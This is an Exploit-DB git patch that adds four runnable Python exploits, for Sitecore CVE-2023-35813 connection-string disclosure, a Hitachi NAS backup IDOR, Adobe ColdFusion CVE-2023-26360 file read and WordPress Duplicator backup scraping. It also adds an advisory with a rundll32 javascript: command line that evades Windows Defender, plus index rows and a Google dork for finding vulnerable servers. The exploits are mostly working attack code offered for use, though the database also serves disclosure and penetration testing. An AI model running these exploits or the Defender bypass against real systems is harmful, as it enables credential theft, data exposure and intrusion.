From ce58678266e4642dc332e828cb3552ff60e59f50 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Tue, 12 Mar 2024 00:16:25 +0000 Subject: [PATCH] DB: 2024-03-12 7 changes to exploits/shellcodes/ghdb Sitecore - Remote Code Execution v8.2 Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore < 14.8.7825.01 - IDOR Adobe ColdFusion versions 2018_15 (and earlier) and 2021_5 and earlier - Arbitrary File Read WordPress Plugin Duplicator < 1.5.7.1 - Unauthenticated Sensitive Data Exposure to Account Takeover Microsoft Windows Defender / Trojan.Win32/Powessere.G - Detection Mitigation Bypass --- exploits/aspx/webapps/51876.py | 102 +++++++++++++++++++++++++++++ exploits/hardware/webapps/51872.py | 87 ++++++++++++++++++++++++ exploits/multiple/webapps/51875.py | 81 +++++++++++++++++++++++ exploits/php/webapps/51874.py | 99 ++++++++++++++++++++++++++++ exploits/windows/local/51873.txt | 71 ++++++++++++++++++++ files_exploits.csv | 5 ++ ghdb.xml | 12 ++++ 7 files changed, 457 insertions(+) create mode 100755 exploits/aspx/webapps/51876.py create mode 100755 exploits/hardware/webapps/51872.py create mode 100755 exploits/multiple/webapps/51875.py create mode 100755 exploits/php/webapps/51874.py create mode 100644 exploits/windows/local/51873.txt diff --git a/exploits/aspx/webapps/51876.py b/exploits/aspx/webapps/51876.py new file mode 100755 index 0000000000..5f8a3949fd --- /dev/null +++ b/exploits/aspx/webapps/51876.py @@ -0,0 +1,102 @@ +#!/usr/bin/env python3 +# +# Exploit Title: Sitecore - Remote Code Execution v8.2 +# Exploit Author: abhishek morla +# Google Dork: N/A +# Date: 2024-01-08 +# Vendor Homepage: https://www.sitecore.com/ +# Software Link: https://dev.sitecore.net/ +# Version: 10.3 +# Tested on: windows64bit / mozila firefox +# CVE : CVE-2023-35813 +# The vulnerability impacts all Experience Platform topologies (XM, XP, XC) from 9.0 Initial Release to 10.3 Initial Release; 8.2 is also impacted +# Blog : https://medium.com/@abhishekmorla/uncovering-cve-2023-35813-retrieving-core-connection-strings-in-sitecore-5502148fce09 +# Video POC : https://youtu.be/vWKl9wgdTB0 + +import argparse +import requests +from urllib.parse import quote +from rich.console import Console + +console = Console() +def initial_test(hostname): + # Initial payload to test vulnerability + test_payload = ''' + <%@Register + TagPrefix = 'x' + Namespace = 'System.Runtime.Remoting.Services' + Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' + %> + + ''' + encoded_payload = quote(test_payload) + + url = f"https://{hostname}/sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index" + headers = {"Content-Type": "application/x-www-form-urlencoded"} + data = "__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"{}\")".format(encoded_payload) + + response = requests.post(url, headers=headers, data=data, verify=False) + + # Check for the test string in the Content-Type of the response + return 'TestVulnerability' in response.headers.get('Content-Type', '') + +def get_payload(choice): + # Payload templates for different options + payloads = { + '1': "<%$ ConnectionStrings:core %>", + '2': "<%$ ConnectionStrings:master %>", + '3': "<%$ ConnectionStrings:web %>" + } + + base_payload = ''' + <%@Register + TagPrefix = 'x' + Namespace = 'System.Runtime.Remoting.Services' + Assembly = 'System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' + %> + + ''' + + return base_payload.format(payloads.get(choice, "Invalid")) + +def main(hostname): + if initial_test(hostname): + print("Exploiting, Please wait...") + console.print("[bold green]The target appears to be vulnerable. Proceed with payload selection.[/bold green]") + print("Select the payload to use:") + print("1: Core connection strings") + print("2: Master connection strings") + print("3: Web connection strings") + payload_choice = input("Enter your choice (1, 2, or 3): ") + + payload = get_payload(payload_choice) + encoded_payload = quote(payload) + + url = f"http://{hostname}/sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index" + headers = {"Content-Type": "application/x-www-form-urlencoded"} + data = "__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\"{}\")".format(encoded_payload) + + response = requests.post(url, headers=headers, data=data) + + if 'Content-Type' in response.headers: + print("Content-Type from the response header:") + print("\n") + print(response.headers['Content-Type']) + else: + print("No Content-Type in the response header. Status Code:", response.status_code) + else: + print("The target does not appear to be vulnerable to CVE-2023-35813.") + + +if __name__ == "__main__": + console.print("[bold green]Author: Abhishek Morla[/bold green]") + console.print("[bold red]CVE-2023-35813[/bold red]") + parser = argparse.ArgumentParser(description='Test for CVE-2023-35813 vulnerability in Sitecore') + parser.add_argument('hostname', type=str, help='Hostname of the target Sitecore instance') + args = parser.parse_args() + + main(args.hostname) \ No newline at end of file diff --git a/exploits/hardware/webapps/51872.py b/exploits/hardware/webapps/51872.py new file mode 100755 index 0000000000..414b7b4e6e --- /dev/null +++ b/exploits/hardware/webapps/51872.py @@ -0,0 +1,87 @@ +#!/usr/bin/python3 +# +# Title: Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore IDOR Vulnerability +# CVE: CVE-2023-5808 +# Date: 2023-12-13 +# Exploit Author: Arslan Masood (@arszilla) +# Vendor: https://www.hitachivantara.com/ +# Version: < 14.8.7825.01 +# Tested On: 13.9.7021.04 + +import argparse +from datetime import datetime +from os import getcwd + +import requests + +parser = argparse.ArgumentParser( + description="CVE-2023-5808 PoC", + usage="./CVE-2023-5808.py --host --id --sso " + ) + +# Create --host argument: +parser.add_argument( + "--host", + required=True, + type=str, + help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443" + ) + +# Create --id argument: +parser.add_argument( + "--id", + required=True, + type=str, + help="JSESSIONID cookie value" + ) + +# Create --sso argument: +parser.add_argument( + "--sso", + required=True, + type=str, + help="JSESSIONIDSSO cookie value" + ) + +args = parser.parse_args() + +def download_file(hostname, jsessionid, jsessionidsso): + # Set the filename: + filename = f"smu_backup-{datetime.now().strftime('%Y-%m-%d_%H%M')}.zip" + + # Vulnerable SMU URL: + smu_url = f"https://{hostname}/mgr/app/template/simple%2CBackupSmuScreen.vm/password/" + + # GET request cookies + smu_cookies = { + "JSESSIONID": jsessionid, + "JSESSIONIDSSO": jsessionidsso + } + + # GET request headers: + smu_headers = { + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", + "Accept-Language": "en-US,en;q=0.5", + "Accept-Encoding": "gzip, deflate", + "Dnt": "1", + "Referer": f"https://{hostname}/mgr/app/action/admin.SmuBackupRestoreAction/eventsubmit_doperform/ignored", + "Upgrade-Insecure-Requests": "1", + "Sec-Fetch-Dest": "document", + "Sec-Fetch-Mode": "navigate", + "Sec-Fetch-Site": "same-origin", + "Sec-Fetch-User": "?1", + "Te": "trailers", + "Connection": "close" + } + + # Send the request: + with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download: + with open(filename, 'wb') as backup_archive: + # Write the zip file to the CWD: + backup_archive.write(file_download.content) + + print(f"{filename} has been downloaded to {getcwd()}") + +if __name__ == "__main__": + download_file(args.host, args.id, args.sso) \ No newline at end of file diff --git a/exploits/multiple/webapps/51875.py b/exploits/multiple/webapps/51875.py new file mode 100755 index 0000000000..a33bc9b957 --- /dev/null +++ b/exploits/multiple/webapps/51875.py @@ -0,0 +1,81 @@ +# Exploit Title: File Read Arbitrary Exploit for CVE-2023-26360 +# Google Dork: [not] +# Date: [12/28/2023] +# Exploit Author: [Youssef Muhammad] +# Vendor Homepage: [ +https://helpx.adobe.com/coldfusion/kb/coldfusion-downloads.html] +# Software Link: [ +https://drive.google.com/drive/folders/17ryBnFhswxiE1sHrNByxMVPKfUnwqmp0] +# Version: [Adobe ColdFusion versions 2018,15 (and earlier) and 2021,5 and +earlier] +# Tested on: [Windows, Linux] +# CVE : [CVE-2023-26360] + +import sys +import requests +import json + +BANNER = """ + ██████ ██ ██ ███████ ██████ ██████ ██████ ██████ ██████ ██████ ██████ ██████ ██████ + ██ ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ████ + ██ ██ ██ █████ █████ █████ ██ ██ ██ █████ █████ █████ █████ ███████ █████ ███████ ██ ██ ██ + ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ ██ + ██████ ████ ███████ ███████ ██████ ███████ ██████ ███████ ██████ ██████ ██████ ██████ +""" + +RED_COLOR = "\033[91m" +GREEN_COLOR = "\032[42m" +RESET_COLOR = "\033[0m" + +def print_banner(): + print(RED_COLOR + BANNER + " Developed by SecureLayer7" + RESET_COLOR) + return 0 + +def run_exploit(host, target_file, endpoint="/CFIDE/wizards/common/utils.cfc", proxy_url=None): + if not endpoint.endswith('.cfc'): + endpoint += '.cfc' + + if target_file.endswith('.cfc'): + raise ValueError('The TARGET_FILE must not point to a .cfc') + + targeted_file = f"a/{target_file}" + json_variables = json.dumps({"_metadata": {"classname": targeted_file}, "_variables": []}) + + vars_get = {'method': 'test', '_cfclient': 'true'} + uri = f'{host}{endpoint}' + + response = requests.post(uri, params=vars_get, data={'_variables': json_variables}, proxies={'http': proxy_url, 'https': proxy_url} if proxy_url else None) + + file_data = None + splatter = '' + + if response.status_code in [404, 500] and splatter in response.text: + file_data = response.text.split(splatter, 1)[0] + + if file_data is None: + raise ValueError('Failed to read the file. Ensure the CFC_ENDPOINT, CFC_METHOD, and CFC_METHOD_PARAMETERS are set correctly, and that the endpoint is accessible.') + + print(file_data) + + # Save the output to a file + output_file_name = 'output.txt' + with open(output_file_name, 'w') as output_file: + output_file.write(file_data) + print(f"The output saved to {output_file_name}") + +if __name__ == "__main__": + if not 3 <= len(sys.argv) <= 5: + print("Usage: python3 script.py [endpoint] [proxy_url]") + sys.exit(1) + + print_banner() + + host = sys.argv[1] + target_file = sys.argv[2] + endpoint = sys.argv[3] if len(sys.argv) > 3 else "/CFIDE/wizards/common/utils.cfc" + proxy_url = sys.argv[4] if len(sys.argv) > 4 else None + + try: + run_exploit(host, target_file, endpoint, proxy_url) + except Exception as e: + print(f"Error: {e}") \ No newline at end of file diff --git a/exploits/php/webapps/51874.py b/exploits/php/webapps/51874.py new file mode 100755 index 0000000000..b793dd7506 --- /dev/null +++ b/exploits/php/webapps/51874.py @@ -0,0 +1,99 @@ +# Exploit Title: WordPress Plugin Duplicator < 1.5.7.1 - +Unauthenticated Sensitive Data Exposure to Account Takeover +# Google Dork: inurl:("plugins/duplicator/") +# Date: 2023-12-04 +# Exploit Author: Dmitrii Ignatyev +# Vendor Homepage: +https://duplicator.com/?utm_source=duplicator_free&utm_medium=wp_org&utm_content=desc_details&utm_campaign=duplicator_free +# Software Link: https://wordpress.org/plugins/duplicator/ +# Version: 1.5.7.1 +# Tested on: Wordpress 6.4 +# CVE : CVE-2023-6114# CVE-Link : +https://wpscan.com/vulnerability/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1/ + +# CVE-Link : https://research.cleantalk.org/cve-2023-6114-duplicator-poc-exploit/A +severe vulnerability has been discovered in the directory +*/wordpress/wp-content/backups-dup-lite/tmp/*. This flaw not only +exposes extensive information about the site, including its +configuration, directories, and files, but more critically, it +provides unauthorized access to sensitive data within the database and +all data inside. Exploiting this vulnerability poses an imminent +threat, leading to potential *brute force attacks on password hashes +and, subsequently, the compromise of the entire system*.* +POC*: + +1) It is necessary that either the administrator or auto-backup works +automatically at the scheduled time + +2) Exploit will send file search requests every 5 seconds + +3) I attack the site with this vulnerability using an exploit + +Exploit sends a request to the server every 5 seconds along the path +“*http://your_site/wordpress/wp-content/backups-dup-lite/tmp/ +”* and if +it finds something in the index of, it instantly parses all the data +and displays it on the screen + +Exploit (python3): + +import requests +from bs4 import BeautifulSoup +import re +import time + +url = "http://127.0.0.1/wordpress/wp-content/backups-dup-lite/tmp/" +processed_files = set() + +def get_file_names(url): + response = requests.get(url) + + if response.status_code == 200 and len(response.text) > 0: + soup = BeautifulSoup(response.text, 'html.parser') + links = soup.find_all('a') + + file_names = [] + for link in links: + file_name = link.get('href') + if file_name != "../" and not file_name.startswith("?"): + file_names.append(file_name) + + return file_names + return [] + +def get_file_content(url, file_name): + file_url = url + file_name + + + if re.search(r'\.zip(?:\.|$)', file_name, re.IGNORECASE): + print(f"Ignoring file: {file_name}") + return None + + file_response = requests.get(file_url) + + if file_response.status_code == 200: + return file_response.text + return None + +while True: + file_names = get_file_names(url) + + if file_names: + print("File names on the page:") + for file_name in file_names: + if file_name not in processed_files: + print(file_name) + file_content = get_file_content(url, file_name) + + if file_content is not None: + print("File content:") + print(file_content) + processed_files.add(file_name) + + time.sleep(5) + + + +-- +With best regards, +Dmitrii Ignatyev, Penetration Tester \ No newline at end of file diff --git a/exploits/windows/local/51873.txt b/exploits/windows/local/51873.txt new file mode 100644 index 0000000000..afa4dfd5c8 --- /dev/null +++ b/exploits/windows/local/51873.txt @@ -0,0 +1,71 @@ +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt +[+] twitter.com/hyp3rlinx +[+] ISR: ApparitionSec + + +[Vendor] +www.microsoft.com + + +[Product] +Windows Defender + + +[Vulnerability Type] +Windows Defender Detection Mitigation Bypass +TrojanWin32Powessere.G + + +[CVE Reference] +N/A + + +[Security Issue] +Trojan.Win32/Powessere.G / Mitigation Bypass Part 2. + +Typically, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail +and attackers will typically get an "Access is denied" error message. + +Back in 2022, I disclosed how that could be easily bypassed by passing an extra path traversal when referencing mshtml but since has been mitigated. +However, I discovered using multi-commas "," will bypass that mitigation and successfully execute as of the time of this writing. + + +[References] +https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt + + +[Exploit/POC] +Open command prompt as Administator. + +C:\sec>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(666) +Access is denied. + +C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(666) + +Multi-commas, for the Win! + + +[Network Access] +Local + + +[Severity] +High + + +[Disclosure Timeline] +February 7, 2024: Public Disclosure + + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 406b220231..ffa32025df 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -1842,6 +1842,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 47777,exploits/aspx/webapps/47777.txt,"Roxy Fileman 1.4.5 - Directory Traversal",2019-12-16,"Patrik Lantz",webapps,aspx,,2019-12-16,2019-12-18,0,CVE-2019-19731,,,,, 47589,exploits/aspx/webapps/47589.txt,"SD.NET RIM 4.7.3c - 'idtyp' SQL Injection",2019-11-05,"Fabian Mosch_ Nick Theisinger",webapps,aspx,80,2019-11-05,2019-11-05,0,,"SQL Injection (SQLi)",,,, 44285,exploits/aspx/webapps/44285.txt,"SecurEnvoy SecurMail 9.1.501 - Multiple Vulnerabilities",2018-03-13,"SEC Consult",webapps,aspx,,2018-03-13,2018-03-13,0,CVE-2018-7707;CVE-2018-7706;CVE-2018-7705;CVE-2018-7704;CVE-2018-7703;CVE-2018-7702;CVE-2018-7701,,,,, +51876,exploits/aspx/webapps/51876.py,"Sitecore - Remote Code Execution v8.2",2024-03-11,"abhishek morla",webapps,aspx,,2024-03-11,2024-03-11,0,,,,,, 46987,exploits/aspx/webapps/46987.txt,"Sitecore 8.x - Deserialization Remote Code Execution",2019-06-13,"Jarad Kopf",webapps,aspx,,2019-06-13,2019-06-13,0,CVE-2019-11080,,,,, 47106,exploits/aspx/webapps/47106.txt,"Sitecore 9.0 rev 171002 - Persistent Cross-Site Scripting",2019-07-11,"Owais Mehtab",webapps,aspx,443,2019-07-11,2019-07-11,0,CVE-2019-13493,"Cross-Site Scripting (XSS)",,,, 41618,exploits/aspx/webapps/41618.txt,"Sitecore CMS 8.1 Update-3 - Cross-Site Scripting",2017-03-15,"Pralhad Chaskar",webapps,aspx,,2017-03-15,2017-03-15,0,CVE-2016-8855,,,,, @@ -4470,6 +4471,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 48901,exploits/hardware/webapps/48901.sh,"HiSilicon video encoders - RCE via unauthenticated upload of malicious firmware",2020-10-19,"Alexei Kojenov",webapps,hardware,,2020-10-19,2020-10-19,0,CVE-2020-24217,,,,, 48899,exploits/hardware/webapps/48899.sh,"HiSilicon Video Encoders - Unauthenticated file disclosure via path traversal",2020-10-19,"Alexei Kojenov",webapps,hardware,,2020-10-19,2020-10-19,0,CVE-2020-24219,,,,, 48903,exploits/hardware/webapps/48903.sh,"HiSilicon Video Encoders - Unauthenticated RTSP buffer overflow (DoS)",2020-10-19,"Alexei Kojenov",webapps,hardware,,2020-10-19,2020-10-19,0,CVE-2020-24214,,,,, +51872,exploits/hardware/webapps/51872.py,"Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore < 14.8.7825.01 - IDOR",2024-03-11,"Arslan Masood",webapps,hardware,,2024-03-11,2024-03-11,0,,,,,, 40158,exploits/hardware/webapps/40158.txt,"Hitron CGNV4 Modem/Router 4.3.9.9-SIP-UPC - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",webapps,hardware,80,2016-07-25,2016-07-25,0,,,,,,http://www.search-lab.hu/advisories/secadv-20160720 38575,exploits/hardware/webapps/38575.txt,"Hitron Router CGN3ACSMR 4.5.8.16 - Arbitrary Code Execution",2015-10-30,"Dolev Farhi",webapps,hardware,,2015-10-30,2015-10-30,0,OSVDB-129707,,,,, 47806,exploits/hardware/webapps/47806.txt,"HomeAutomation 3.3.2 - Persistent Cross-Site Scripting",2019-12-30,LiquidWorm,webapps,hardware,,2019-12-30,2019-12-30,0,,,,,, @@ -11603,6 +11605,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 51221,exploits/multiple/webapps/51221.txt,"Active eCommerce CMS 6.5.0 - Stored Cross-Site Scripting (XSS)",2023-04-03,"Sajibe Kanti",webapps,multiple,,2023-04-03,2023-04-03,0,,,,,, 45979,exploits/multiple/webapps/45979.txt,"Adobe ColdFusion 2018 - Arbitrary File Upload",2018-12-11,"Vahagn Vardanyan",webapps,multiple,,2018-12-11,2018-12-11,0,CVE-2018-15961,,,,, 40346,exploits/multiple/webapps/40346.py,"Adobe ColdFusion < 11 Update 10 - XML External Entity Injection",2016-09-07,"Dawid Golunski",webapps,multiple,,2016-09-07,2016-09-07,1,CVE-2016-4264,,,,,http://legalhackers.com/advisories/Adobe-ColdFusion-11-XXE-Exploit-CVE-2016-4264.txt +51875,exploits/multiple/webapps/51875.py,"Adobe ColdFusion versions 2018_15 (and earlier) and 2021_5 and earlier - Arbitrary File Read",2024-03-11,"Youssef Muhammad",webapps,multiple,,2024-03-11,2024-03-11,0,,,,,, 49550,exploits/multiple/webapps/49550.txt,"Adobe Connect 10 - Username Disclosure",2021-02-09,h4shur,webapps,multiple,,2021-02-09,2023-04-06,0,CVE-2023-22232,,,,, 51327,exploits/multiple/webapps/51327.txt,"Adobe Connect 11.4.5 - Local File Disclosure",2023-04-08,h4shur,webapps,multiple,,2023-04-08,2023-04-08,0,CVE-2023-22232,,,,, 33180,exploits/multiple/webapps/33180.txt,"Adobe Flex SDK 3.x - 'index.template.html' Cross-Site Scripting",2009-08-19,"Adam Bixby",webapps,multiple,,2009-08-19,2014-05-05,1,CVE-2009-1879;OSVDB-57340,,,,,https://www.securityfocus.com/bid/36087/info @@ -33027,6 +33030,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49288,exploits/php/webapps/49288.rb,"Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read (Metasploit)",2020-12-18,"SunCSR Team",webapps,php,,2020-12-18,2020-12-18,1,,,,,, 50992,exploits/php/webapps/50992.txt,"WordPress Plugin Duplicator 1.4.6 - Unauthenticated Backup Download",2022-08-01,SecuriTrust,webapps,php,,2022-08-01,2022-08-01,0,CVE-2022-2551,,,,, 50993,exploits/php/webapps/50993.txt,"WordPress Plugin Duplicator 1.4.7 - Information Disclosure",2022-08-01,SecuriTrust,webapps,php,,2022-08-01,2023-08-02,1,CVE-2022-2552,,,,, +51874,exploits/php/webapps/51874.py,"WordPress Plugin Duplicator < 1.5.7.1 - Unauthenticated Sensitive Data Exposure to Account Takeover",2024-03-11,"Dmitrii Ignatyev",webapps,php,,2024-03-11,2024-03-11,0,,,,,, 37162,exploits/php/webapps/37162.txt,"WordPress Plugin Dynamic Widgets 1.5.1 - 'themes.php' Cross-Site Scripting",2012-05-15,"Heine Pedersen",webapps,php,,2012-05-15,2015-06-01,1,,"WordPress Plugin",,,,https://www.securityfocus.com/bid/53513/info 30063,exploits/php/webapps/30063.txt,"WordPress Plugin DZS Video Gallery 3.1.3 - Remote File Disclosure / Local File Disclosure",2013-12-06,"aceeeeeeeer .",webapps,php,,2013-12-06,2013-12-06,1,,"WordPress Plugin",,http://www.exploit-db.com/screenshots/idlt30500/screen-shot-2013-12-06-at-111802.png,, 39553,exploits/php/webapps/39553.txt,"WordPress Plugin DZS Videogallery < 8.60 - Multiple Vulnerabilities",2016-03-11,"Colette Chamberland",webapps,php,80,2016-03-11,2016-03-11,0,,"WordPress Plugin",,,, @@ -40920,6 +40924,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 46222,exploits/windows/local/46222.txt,"Microsoft Windows CONTACT - HTML Injection / Remote Code Execution",2019-01-23,hyp3rlinx,local,windows,,2019-01-23,2019-01-24,1,,,,,, 46188,exploits/windows/local/46188.txt,"Microsoft Windows CONTACT - Remote Code Execution",2019-01-17,hyp3rlinx,local,windows,,2019-01-17,2019-01-18,1,,,,,, 50654,exploits/windows/local/50654.txt,"Microsoft Windows Defender - Detections Bypass",2022-01-12,hyp3rlinx,local,windows,,2022-01-12,2022-01-12,0,,,,,, +51873,exploits/windows/local/51873.txt,"Microsoft Windows Defender / Trojan.Win32/Powessere.G - Detection Mitigation Bypass",2024-03-11,hyp3rlinx,local,windows,,2024-03-11,2024-03-11,0,,,,,, 40562,exploits/windows/local/40562.cpp,"Microsoft Windows Diagnostics Hub - DLL Load Privilege Escalation (MS16-125)",2016-10-17,"Google Security Research",local,windows,,2016-10-17,2016-10-17,1,CVE-2016-7188;MS16-125,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=887 41619,exploits/windows/local/41619.txt,"Microsoft Windows DVD Maker 6.1.7 - XML External Entity Injection",2017-03-16,hyp3rlinx,local,windows,,2017-03-16,2017-03-16,0,CVE-2017-0045,,,,, 40607,exploits/windows/local/40607.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",local,windows,,2016-10-20,2016-10-21,1,CVE-2016-3387;MS16-118,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=878 diff --git a/ghdb.xml b/ghdb.xml index d0e479c4ae..0fa39ba83d 100644 --- a/ghdb.xml +++ b/ghdb.xml @@ -117444,6 +117444,18 @@ Felipe Molina 2013-11-25 anonymous + + 8423 + https://www.exploit-db.com/ghdb/8423 + Vulnerable Servers + inurl:"wa.exe?TICKET" + inurl:"wa.exe?TICKET" + inurl:"wa.exe?TICKET" + https://www.google.com/search?q=inurl:"wa.exe?TICKET" + + 2024-03-11 + Nadir Boulacheb (RubX) + 3766 https://www.exploit-db.com/ghdb/3766